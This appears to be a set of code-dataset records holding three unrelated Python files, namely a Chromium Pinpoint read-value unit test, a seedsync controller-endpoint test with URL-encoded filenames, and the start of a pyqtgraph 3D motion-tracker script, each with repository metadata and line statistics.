| 7
|
7cc13264bfe954dfc0872eaa2f6fefea7461345f
| 20,767
|
py
|
Python
|
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | null | null | null |
dashboard/dashboard/pinpoint/models/quest/read_value_test.py
|
ncalexan/catapult
|
d21a98f0ee0bc0394eb93922d0b274fd6ac281d5
|
[
"BSD-3-Clause"
] | 1
|
2019-04-21T23:48:15.000Z
|
2019-04-21T23:48:15.000Z
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import unittest
import mock
from dashboard.pinpoint.models.quest import read_value
from tracing.value import histogram_set
from tracing.value import histogram as histogram_module
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
_BASE_ARGUMENTS_HISTOGRAMS = {'benchmark': 'speedometer'}
_BASE_ARGUMENTS_GRAPH_JSON = {
'benchmark': 'base_perftests',
'chart': 'chart_name',
'trace': 'trace_name',
}
class ReadHistogramsJsonValueQuestTest(unittest.TestCase):
def testMinimumArguments(self):
quest = read_value.ReadHistogramsJsonValue.FromDict(
_BASE_ARGUMENTS_HISTOGRAMS)
expected = read_value.ReadHistogramsJsonValue(
'speedometer/perf_results.json')
self.assertEqual(quest, expected)
def testAllArguments(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['chart'] = 'timeToFirst'
arguments['tir_label'] = 'pcv1-cold'
arguments['trace'] = 'trace_name'
arguments['statistic'] = 'avg'
quest = read_value.ReadHistogramsJsonValue.FromDict(arguments)
expected = read_value.ReadHistogramsJsonValue(
'speedometer/perf_results.json', 'timeToFirst',
'pcv1-cold', 'trace_name', 'avg')
self.assertEqual(quest, expected)
def testWindows(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['dimensions'] = [{'key': 'os', 'value': 'Windows-10'}]
quest = read_value.ReadHistogramsJsonValue.FromDict(arguments)
expected = read_value.ReadHistogramsJsonValue(
'speedometer\\perf_results.json')
self.assertEqual(quest, expected)
class ReadGraphJsonValueQuestTest(unittest.TestCase):
def testMinimumArguments(self):
quest = read_value.ReadGraphJsonValue.FromDict(_BASE_ARGUMENTS_GRAPH_JSON)
expected = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', 'chart_name', 'trace_name')
self.assertEqual(quest, expected)
def testMissingChart(self):
arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['chart']
quest = read_value.ReadGraphJsonValue.FromDict(arguments)
expected = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', None, 'trace_name')
self.assertEqual(quest, expected)
def testMissingTrace(self):
arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['trace']
quest = read_value.ReadGraphJsonValue.FromDict(arguments)
expected = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', 'chart_name', None)
self.assertEqual(quest, expected)
class _ReadValueExecutionTest(unittest.TestCase):
def setUp(self):
patcher = mock.patch('dashboard.services.isolate.Retrieve')
self._retrieve = patcher.start()
self.addCleanup(patcher.stop)
def SetOutputFileContents(self, contents):
self._retrieve.side_effect = (
'{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
json.dumps(contents),
)
def assertReadValueError(self, execution):
self.assertTrue(execution.completed)
self.assertTrue(execution.failed)
self.assertIsInstance(execution.exception, basestring)
last_exception_line = execution.exception.splitlines()[-1]
self.assertTrue(last_exception_line.startswith('ReadValueError'))
def assertReadValueSuccess(self, execution):
self.assertTrue(execution.completed)
self.assertFalse(execution.failed)
self.assertEqual(execution.result_arguments, {})
def assertRetrievedOutputJson(self):
expected_calls = [
mock.call('server', 'output hash'),
mock.call('server', 'output json hash'),
]
self.assertEqual(self._retrieve.mock_calls, expected_calls)
class ReadHistogramsJsonValueTest(_ReadValueExecutionTest):
def testReadHistogramsJsonValue(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist.name, 'tir_label', 'story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStoryNeedsEscape(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['http://story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist.name, 'tir_label', 'http://story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatistic(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist.name,
'tir_label', 'story', statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (1,))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatisticNoSamples(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist.name,
'tir_label', 'story', statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueMultipleHistograms(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist2 = histogram_module.Histogram('hist', 'count')
hist2.AddSample(0)
hist2.AddSample(1)
hist2.AddSample(2)
hist3 = histogram_module.Histogram('some_other_histogram', 'count')
hist3.AddSample(3)
hist3.AddSample(4)
hist3.AddSample(5)
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist.name, 'tir_label', 'story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2, 0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist3 = histogram_module.Histogram('hist3', 'count')
hist3.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url2']))
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed': True,
'exception': None,
'details': [
{
'key': 'trace',
'value': 'trace_url1',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'trace_url2',
'url': 'trace_url2',
},
{
'key': 'trace',
'value': 'trace_url3',
'url': 'trace_url3',
},
],
},
execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsDiagnosticRefSkipTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist2.diagnostics[reserved_infos.TRACE_URLS.name].guid = 'foo'
histograms = histogram_set.HistogramSet([hist, hist2])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed': True,
'exception': None,
'details': [
{
'key': 'trace',
'value': 'trace_url1',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'trace_url2',
'url': 'trace_url2',
},
],
},
execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoTirLabel(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hist.name, tir_label='tir_label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoStory(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hist.name, story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryTIRLabel(self):
samples = []
hists = []
for i in xrange(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hists[0].name, tir_label='tir_label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummary(self):
samples = []
hists = []
for i in xrange(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:tir_label1']))
hists.append(hist)
samples.extend(hist.sample_values)
for i in xrange(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['another_story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:tir_label2']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name=hists[0].name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryNoHistName(self):
samples = []
hists = []
for i in xrange(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:tir_label1']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name,
generic_set.GenericSet(['group:tir_label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue('chartjson-output.json')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, ())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithMissingFile(self):
self._retrieve.return_value = '{"files": {}}'
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='metric', tir_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueEmptyHistogramSet(self):
self.SetOutputFileContents([])
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='metric', tir_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueWithMissingHistogram(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='does_not_exist')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='chart')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueTirLabelWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='chart', tir_label='tir_label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadHistogramsJsonValueStoryWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadHistogramsJsonValue(
'chartjson-output.json', hist_name='chart', story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
class ReadGraphJsonValueTest(_ReadValueExecutionTest):
def testReadGraphJsonValue(self):
self.SetOutputFileContents(
{'chart': {'traces': {'trace': ['126444.869721', '0.0']}}})
quest = read_value.ReadGraphJsonValue(
'chartjson-output.json', 'chart', 'trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
self.assertRetrievedOutputJson()
def testReadGraphJsonValueWithMissingFile(self):
self._retrieve.return_value = '{"files": {}}'
quest = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', 'metric', 'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadGraphJsonValueWithMissingChart(self):
self.SetOutputFileContents({})
quest = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', 'metric', 'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
def testReadGraphJsonValueWithMissingTrace(self):
self.SetOutputFileContents({'chart': {'traces': {}}})
quest = read_value.ReadGraphJsonValue(
'base_perftests/perf_results.json', 'metric', 'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution)
| 35.805172
| 80
| 0.697693
| 2,001
| 20,767
| 7.092454
| 0.103948
| 0.022196
| 0.027621
| 0.04566
| 0.801297
| 0.768602
| 0.759019
| 0.729848
| 0.721815
| 0.710118
| 0
| 0.008649
| 0.181586
| 20,767
| 579
| 81
| 35.867012
| 0.826371
| 0.007464
| 0
| 0.709746
| 0
| 0
| 0.121555
| 0.03586
| 0
| 0
| 0
| 0
| 0.137712
| 1
| 0.069915
| false
| 0
| 0.016949
| 0
| 0.097458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b0c06ab75dc62abed4dbd1aab966e153eccaf7f
| 9,689
|
py
|
Python
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 255
|
2017-12-25T00:53:40.000Z
|
2022-03-27T10:29:21.000Z
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 111
|
2018-01-04T10:35:49.000Z
|
2022-03-29T15:12:52.000Z
|
src/python/tests/integration/test_web/test_handler/test_controller.py
|
annihilatethee/seedsync
|
7a0ba915cc570bc12916088baa6eb6bee6f291c9
|
[
"Apache-2.0"
] | 53
|
2017-12-25T09:34:19.000Z
|
2022-03-15T17:53:27.000Z
|
# Copyright 2017, Inderpreet Singh, All rights reserved.
from unittest.mock import MagicMock
from urllib.parse import quote
from tests.integration.test_web.test_web_app import BaseTestWebApp
from controller import Controller
class TestControllerHandler(BaseTestWebApp):
def test_queue(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/queue/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_stop(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/stop/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_extract(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/extract/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_delete_local(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/delete_local/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_LOCAL, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/delete_local/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_LOCAL, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/delete_local/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_LOCAL, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/delete_local/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_LOCAL, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/delete_local/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_LOCAL, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_delete_remote(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/delete_remote/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_REMOTE, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/delete_remote/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_REMOTE, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/delete_remote/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_REMOTE, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/delete_remote/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_REMOTE, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/delete_remote/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.DELETE_REMOTE, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
| 52.372973
| 81
| 0.688203
| 1,171
| 9,689
| 5.578992
| 0.048676
| 0.114802
| 0.101791
| 0.139293
| 0.959743
| 0.959743
| 0.959743
| 0.959743
| 0.957294
| 0.95163
| 0
| 0.00854
| 0.166065
| 9,689
| 184
| 82
| 52.657609
| 0.8
| 0.005573
| 0
| 0.9
| 0
| 0
| 0.149486
| 0.090834
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.1
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1651866937efa1d73f01ed51bd59991daaefa7
| 13,537
|
py
|
Python
|
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | 1
|
2022-02-16T10:54:52.000Z
|
2022-02-16T10:54:52.000Z
|
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | null | null | null |
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | 1
|
2022-02-16T10:48:17.000Z
|
2022-02-16T10:48:17.000Z
|
#!/usr/bin/env python
import os,sys,time
import random, math
import numpy as np
import py3toolbox as tb
import multiprocessing as mp
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QApplication, QOpenGLWidget
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import math_helper as mh
MODULE_NAME = 'MotionTracker'
def get_config():
return tb.load_json('./config.json')
"""
#
# Motion Tracker
# - 3D motion tacking
#
#
"""
class MotionTracker(mp.Process):
def __init__(self, q_in, q_mon):
mp.Process.__init__(self)
self.config = get_config()[MODULE_NAME]
self.q_in = q_in
self.q_mon = q_mon
self.trace = {}
self.lines = np.array([ [0,0,0] ])
def init_plot(self):
self.win = pg.GraphicsWindow(size=(800,600), title="3D Motion Tracker")
self.win.move(100, 800)
self.win.addLayout(row=1, col=1)
self.w = gl.GLViewWidget()
layoutgb = QtGui.QGridLayout()
self.win.setLayout(layoutgb)
layoutgb.addWidget(self.w,0,0)
self.w.opts['distance'] = 400
self.w.setWindowTitle('GL LinePlotItem')
self.w.setGeometry(0, 0, 2000, 2000)
self.w.show()
# create the background grids
gx = gl.GLGridItem()
gx.setSize(200,200,200)
gx.setColor((0, 255, 0, 80.0))
#gx.setSpacing(3,3,3)
gx.rotate(90, 0, 1, 0)
self.w.addItem(gx)
gy = gl.GLGridItem()
gy.setSize(200,200,200)
gy.setColor((255, 0, 0, 80.0))
#gy.setSpacing(3,3,3)
gy.rotate(90, 1, 0, 0)
self.w.addItem(gy)
gz = gl.GLGridItem()
gz.setSize(200,200,200)
gz.setColor((0, 0, 255, 160.0))
#gz.setSpacing(3,3,3)
self.w.addItem(gz)
self.trace = gl.GLLinePlotItem(pos=self.lines, color=pg.glColor((1, 1)), width=5, antialias=True)
self.w.addItem(self.trace)
def update(self):
